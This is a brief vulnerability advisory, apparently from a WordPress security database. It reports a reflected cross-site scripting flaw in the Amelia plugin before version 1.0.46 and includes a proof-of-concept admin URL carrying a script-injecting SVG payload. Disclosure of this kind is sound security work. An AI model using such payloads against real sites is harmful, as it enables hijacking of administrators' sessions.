Amelia < 1.0.46 - Reflected Cross-Site Scripting

2022-02-2300:00:00

Ran Crane

246

0.001 Low

EPSS

Percentile

40.4%

The plugin does not sanitize and escape the code parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.

https://example.com/wp-admin/admin.php?page=wpamelia-dashboard&code=</script><svg/onload=alert(/XSS/)>

0.001 Low

EPSS

Percentile

40.4%

Related for WPEX-ID:FD8C720A-A94A-438F-B686-3A734E3C24E4